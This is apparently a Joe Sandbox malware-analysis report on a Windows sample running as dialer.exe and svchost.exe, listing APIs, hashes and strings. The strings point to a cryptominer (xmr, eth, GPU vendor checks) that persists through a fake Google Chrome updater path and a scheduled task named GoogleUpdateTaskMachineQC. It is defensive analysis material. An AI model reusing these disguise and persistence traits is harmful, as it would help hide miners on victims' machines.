API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction ID: 1cfd4273923a9902b80302180c9fa92e6bed877094e565062285121f79e1ac25
Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction Fuzzy Hash: 2DE03235B01A0486EB08AB62D80834A36E5FB99F06F0880248989077A1DF7EC699CF91

Analysis Process: dialer.exePID: 1060, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	26.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	158
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF75E941131 Relevance: 13.6, APIs: 9, Instructions: 120
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF75E941313), ref: 00007FF75E94116E
_amsg_exit.MSVCRT(?,?,?,00007FF75E941313), ref: 00007FF75E94118D
_initterm.MSVCRT ref: 00007FF75E9411AE
_initterm.MSVCRT ref: 00007FF75E9411D3
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF75E941212
malloc.MSVCRT ref: 00007FF75E941244
strlen.MSVCRT ref: 00007FF75E94125C
malloc.MSVCRT ref: 00007FF75E941268
_cexit.MSVCRT(?,?,?,00007FF75E941313), ref: 00007FF75E9412E3

Memory Dump Source

Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true

Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd

Similarity

API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
String ID:
API String ID: 3714283218-0
Opcode ID: 1afb8f11758ab12f269ae9a193c80dd6acf9b043bf5bbc259c0b9bc123598646
Instruction ID: f2260eb9b4ee50c6167332b570a1ecc088238642f63feb57532cb6adb7cc8205
Opcode Fuzzy Hash: 1afb8f11758ab12f269ae9a193c80dd6acf9b043bf5bbc259c0b9bc123598646
Instruction Fuzzy Hash: F9516465E09B4689FB65FB22EA50279A3A1BF48B84FCC4035DD0D47395EF3DE8418322

Function 00007FF75E943F60 Relevance: 30.8, APIs: 1, Strings: 19, Instructions: 834COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF75E94223C: wcslen.MSVCRT ref: 00007FF75E94224C
Part of subcall function 00007FF75E94223C: _wcsnicmp.MSVCRT ref: 00007FF75E942263

_wcsicmp.MSVCRT ref: 00007FF75E9449C2

Strings

[, xrefs: 00007FF75E944687
eth, xrefs: 00007FF75E944950, 00007FF75E944987, 00007FF75E9449BB
\BaseNamedObjects\vnwbctewzlhbedeyovzifuso, xrefs: 00007FF75E944ACA, 00007FF75E944AF6, 00007FF75E944B23
0, xrefs: 00007FF75E94405F
\reg.exe, xrefs: 00007FF75E9446F5, 00007FF75E944727
\BaseNamedObjects\qqgnfenfemxxtpha, xrefs: 00007FF75E9448A6, 00007FF75E9448E1, 00007FF75E9449D4
\BaseNamedObjects\teunnffqjjjv, xrefs: 00007FF75E943F80, 00007FF75E943FE1
PROGRAMFILES=, xrefs: 00007FF75E944639
\Google\Chrome\updater.exe, xrefs: 00007FF75E9443D1, 00007FF75E94440E, 00007FF75E94450E
\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00007FF75E944322, 00007FF75E94435F, 00007FF75E944391
/, xrefs: 00007FF75E944537
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineQC, xrefs: 00007FF75E944A27, 00007FF75E944A60, 00007FF75E944A90
SYSTEMROOT=, xrefs: 00007FF75E9441D4
\schtasks.exe, xrefs: 00007FF75E9447DA, 00007FF75E944807
xmr, xrefs: 00007FF75E94485F, 00007FF75E9449B4
PROGRAMFILES=, xrefs: 00007FF75E9444C4
\System32, xrefs: 00007FF75E944131, 00007FF75E94421E
\Google\Libs\, xrefs: 00007FF75E9445A8
\cmd.exe, xrefs: 00007FF75E9442A8, 00007FF75E9442DD

Memory Dump Source

Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true

Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd

Similarity

API ID: _wcsicmp_wcsnicmpwcslen
String ID: /$0$PROGRAMFILES=$PROGRAMFILES=$SYSTEMROOT=$[$\BaseNamedObjects\qqgnfenfemxxtpha$\BaseNamedObjects\teunnffqjjjv$\BaseNamedObjects\vnwbctewzlhbedeyovzifuso$\Google\Chrome\updater.exe$\Google\Libs\$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineQC$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\schtasks.exe$eth$xmr
API String ID: 3926934318-1443233506
Opcode ID: e6e2230000fe7e6ce9fcbc56bd5262af9a76e49582b639d4e62c80a508ad9f73
Instruction ID: 10ee615c56acd45b79dbe594495df03b06a82e19a63e18968140ea3318a135ce
Opcode Fuzzy Hash: e6e2230000fe7e6ce9fcbc56bd5262af9a76e49582b639d4e62c80a508ad9f73
Instruction Fuzzy Hash: 21A28F61E0C68694FB21EB24E6103BAF7A1FB55744FC84035CA8C477A6EF7EA145C722

Function 00007FF75E9413B8 Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcsnicmp.MSVCRT ref: 00007FF75E94174E
_wcsnicmp.MSVCRT ref: 00007FF75E9417E6
_wcsnicmp.MSVCRT ref: 00007FF75E94186F
wcsstr.MSVCRT ref: 00007FF75E94190D

Strings

@, xrefs: 00007FF75E9415A5
NVIDIA, xrefs: 00007FF75E94154E, 00007FF75E941713
Advanced Micro Devices, xrefs: 00007FF75E941899, 00007FF75E9418DB
0, xrefs: 00007FF75E9415F8
ProviderName, xrefs: 00007FF75E9414F7
\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\, xrefs: 00007FF75E9413DE, 00007FF75E941429
Q, xrefs: 00007FF75E941480
ATI, xrefs: 00007FF75E941830, 00007FF75E941868
AMD, xrefs: 00007FF75E941573, 00007FF75E9417AB

Memory Dump Source

Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true

Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd

Similarity

API ID: _wcsnicmp$wcsstr
String ID: 0$@$AMD$ATI$Advanced Micro Devices$NVIDIA$ProviderName$Q$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\
API String ID: 950242380-3899023574
Opcode ID: 6b827fd31cd5814922cc61e0589ffdacb0496c5d1af6198efbe5993131eaedc8
Instruction ID: c90f79ccde235d64f4f2f317582106305fbcd3cd31ad29db3adbdd8c85735e35
Opcode Fuzzy Hash: 6b827fd31cd5814922cc61e0589ffdacb0496c5d1af6198efbe5993131eaedc8
Instruction Fuzzy Hash: 6FE16E22E0C78695FB20EB25EA113EAB7A1FB44344F884035DA8C47796EF7DE145C722

Non-executed Functions

Function 00007FF75E9433B4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 00007FF75E94345D
VirtualProtect.KERNEL32 ref: 00007FF75E9434C5
GetLastError.KERNEL32 ref: 00007FF75E9434CF

Strings

Address %p has no image-section, xrefs: 00007FF75E943415
Mingw-w64 runtime failure:, xrefs: 00007FF75E94337B
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF75E943472
Unknown pseudo relocation protocol version %d., xrefs: 00007FF75E9433B9
VirtualProtect failed with code 0x%x, xrefs: 00007FF75E9434D5

Memory Dump Source

Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true

Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuery
String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 637304234-2693646698
Opcode ID: 4c0e7fca995c04cc817b1d3d9dbcb799d863063232bca01154bdc81abab6207f
Instruction ID: 58b9b22a2dd91aecf10ee46fb1d7f1341cf907cd8ecc7834bca98dbd561332ac
Opcode Fuzzy Hash: 4c0e7fca995c04cc817b1d3d9dbcb799d863063232bca01154bdc81abab6207f
Instruction Fuzzy Hash: 6B31BD71F09A0285EA10EF25EA451B8A3A2FB88B94FCC8135DE0D07794EF3DE441C762

Function 00007FF75E941B49 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 306
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncmp.MSVCRT ref: 00007FF75E941CD1
wcslen.MSVCRT ref: 00007FF75E941EFF

Strings

0, xrefs: 00007FF75E941D2E
X, xrefs: 00007FF75E942060
`, xrefs: 00007FF75E94206C

Memory Dump Source

Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true

Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd

Similarity

API ID: wcslenwcsncmp
String ID: 0$X$`
API String ID: 3763518489-2527496196
Opcode ID: bf98eebd0c4874be657d4506fb91d11e86c2d1a510ff09434a144a75df8919a4
Instruction ID: 0cdfcd99745f55e64ed120f01f2fb817c33d637abcb5e7b96b135d4ee2e1b59f
Opcode Fuzzy Hash: bf98eebd0c4874be657d4506fb91d11e86c2d1a510ff09434a144a75df8919a4
Instruction Fuzzy Hash: 2DF18F72A08BC181E3709B25E5403EAB7A1FB947A4F448225DAEC47BD9DF7DD184CB11

Function 00007FF75E9434FB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 165
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,00007FF75E94BA38,00000000,?,?,?,00007FF75E94BA30,00007FF75E941208,?,?,?,00007FF75E941313), ref: 00007FF75E943752

Strings

Unknown pseudo relocation bit size %d., xrefs: 00007FF75E94367B
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF75E9436ED
Unknown pseudo relocation protocol version %d., xrefs: 00007FF75E9435F2

Memory Dump Source

Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true

Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 544645111-1286557213
Opcode ID: 6d2756cb95d16e08724b8ec44e49268cac4bd7fa9b888f6af2c99903510c2466
Instruction ID: 0f92c3885b1bc0119d5909377009d0d8bcdab8a1491f4e9b10d05e8710da05c0
Opcode Fuzzy Hash: 6d2756cb95d16e08724b8ec44e49268cac4bd7fa9b888f6af2c99903510c2466
Instruction Fuzzy Hash: D061BE62F0864295FB24EB35D6462B8A7A0BF44B98F8C8131DA1D07BD5DF3DE581C722

Function 00007FF75E9437B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

signal.MSVCRT ref: 00007FF75E943876
signal.MSVCRT ref: 00007FF75E94388B

Strings

CCG , xrefs: 00007FF75E9437D6

Memory Dump Source

Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true

Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 2d778218463b6a2644a9b9654bbee096ef51d4d78e2cedb306f439b0da448852
Instruction ID: db35a0c98b5fc6f4e19232c828df8949fa61e7f12b2cfc28bd97daa6ce0473f8
Opcode Fuzzy Hash: 2d778218463b6a2644a9b9654bbee096ef51d4d78e2cedb306f439b0da448852
Instruction Fuzzy Hash: A1217C61E0D14282FB78B23596813BCD182BF55764F9C8936D90E833D1DF1EA8819323

Function 00007FF75E943260 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fprintf.MSVCRT ref: 00007FF75E94331A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF75E94330D
Unknown error, xrefs: 00007FF75E943277

Memory Dump Source

Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true

Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 589ca410a5b83360197308b7ed17ba06b0d09163feadd3698f94838f3051e25e
Instruction ID: 7e86e4e3795c688f9c19c5126b8bb17f9d7a12a19555cb3af6d36348a7d12891
Opcode Fuzzy Hash: 589ca410a5b83360197308b7ed17ba06b0d09163feadd3698f94838f3051e25e
Instruction Fuzzy Hash: E6115162C08E8482D311DF2CE4413EAB3B0FF9A755F945722EBC816624DF3AD152C700

Function 00007FF75E9432BB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF75E94331A

Strings

The result is too small to be represented (UNDERFLOW), xrefs: 00007FF75E9432BB
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF75E94330D

Memory Dump Source

Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true

Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: bb0e9cb04218332e306efb3d1e0d4a509f838d58428ac9f6c3ae91d5ddaed728
Instruction ID: ce9566f5e8d76d717d8203a10345d0076bb9ac12443fe45470c220328bb6509e
Opcode Fuzzy Hash: bb0e9cb04218332e306efb3d1e0d4a509f838d58428ac9f6c3ae91d5ddaed728
Instruction Fuzzy Hash: D2F01D66808F8482D211DF2CE4002EBB370FF9E789F645326EBC926624DF2DD542C710

Function 00007FF75E943297 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fprintf.MSVCRT ref: 00007FF75E94331A

Strings

Argument domain error (DOMAIN), xrefs: 00007FF75E943297
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF75E94330D

Memory Dump Source

Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true

Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 80c12c21b195a29f2f26e0ff6e964f92279c4d5a277077c4cb92da5b353aee2c
Instruction ID: 0cc85210255d85834fdd2442cc5d6a520d7c37cf439ead99887fcfab83b49156
Opcode Fuzzy Hash: 80c12c21b195a29f2f26e0ff6e964f92279c4d5a277077c4cb92da5b353aee2c
Instruction Fuzzy Hash: 63F01D66808F8882D211EF28E4002ABB370FF9E789F645326EBC926664DF3DD552C710

Function 00007FF75E9432A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF75E94331A

Strings

Overflow range error (OVERFLOW), xrefs: 00007FF75E9432A0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF75E94330D

Memory Dump Source

Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true

Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: c2297662c0c337e4b165d6bf0dacfb9c46326693d3958f1b0d1ce1bd7cac4244
Instruction ID: 2b5a63f8fbb24a1ea77cba49f7193ae5475112504e5be30292bf3229687b5b60
Opcode Fuzzy Hash: c2297662c0c337e4b165d6bf0dacfb9c46326693d3958f1b0d1ce1bd7cac4244
Instruction Fuzzy Hash: 8BF01D66808F8482D211DF28E4002ABB370FF9E789F645326EBCD26624DF2DD542CB10

Function 00007FF75E9432A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF75E94331A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF75E94330D
Partial loss of significance (PLOSS), xrefs: 00007FF75E9432A9

Memory Dump Source

Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true

Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: 1b386bd2b03c1348818ddf3c84a533054eb9c2b894c45f8a032dfed0689c5345
Instruction ID: 0fcf8d4c9b8bc547e19799f9f37a3d31a3a340af0b010afde377558f8712b039
Opcode Fuzzy Hash: 1b386bd2b03c1348818ddf3c84a533054eb9c2b894c45f8a032dfed0689c5345
Instruction Fuzzy Hash: 1CF01D66808F8482D211DF28E4002ABB371FF9E789F645326EBC926624DF2DD542CB10

Function 00007FF75E9432B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF75E94331A

Strings

Total loss of significance (TLOSS), xrefs: 00007FF75E9432B2
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF75E94330D

Memory Dump Source

Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true

Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: c8df7b83e6f525c740f07ba842bee41caed6b735e9d131bcd7f03008dc688af2
Instruction ID: de1ac79e2de1dfc37f68126d2318b39edf02c173fd6276aacfe7e41eb11c4c49
Opcode Fuzzy Hash: c8df7b83e6f525c740f07ba842bee41caed6b735e9d131bcd7f03008dc688af2
Instruction Fuzzy Hash: 8EF01D66808F8482D211EF28E4002ABB370FF9E789F645326EBC926664DF2DD542C710

Function 00007FF75E9432C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF75E94331A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF75E94330D
Argument singularity (SIGN), xrefs: 00007FF75E9432C4

Memory Dump Source

Source File: 0000002F.00000002.3323156977.00007FF75E941000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF75E940000, based on PE: true

Associated: 0000002F.00000002.3322938034.00007FF75E940000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 2e00c8b2886a6415b21ac8021bb90762be8cffcb15cbd36188c64a4976bc95c1
Instruction ID: 9ebf166856dd48b4f5cedfac9f2e6ebe5842f28ac06f57d7f96ce966cb68cbe2
Opcode Fuzzy Hash: 2e00c8b2886a6415b21ac8021bb90762be8cffcb15cbd36188c64a4976bc95c1
Instruction Fuzzy Hash: E3F0CD66808F8482D211DF28E4012ABB371FF9E789F645326EFC926624DF29D556C710

Analysis Process: svchost.exePID: 376, Parent PID: 6064COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	468
Total number of Limit Nodes:	3

Executed Functions

Function 0000023C9FD91268 Relevance: 5.0, APIs: 4, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000023C9FD9126E
HeapAlloc.KERNEL32 ref: 0000023C9FD9127D
GetProcessHeap.KERNEL32 ref: 0000023C9FD91297
HeapAlloc.KERNEL32 ref: 0000023C9FD912A8

Memory Dump Source

Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction ID: cbded6a7cf5b7805f93012bc6e9f91fd45a45d9c4a0ce9048524cc3669026ffc
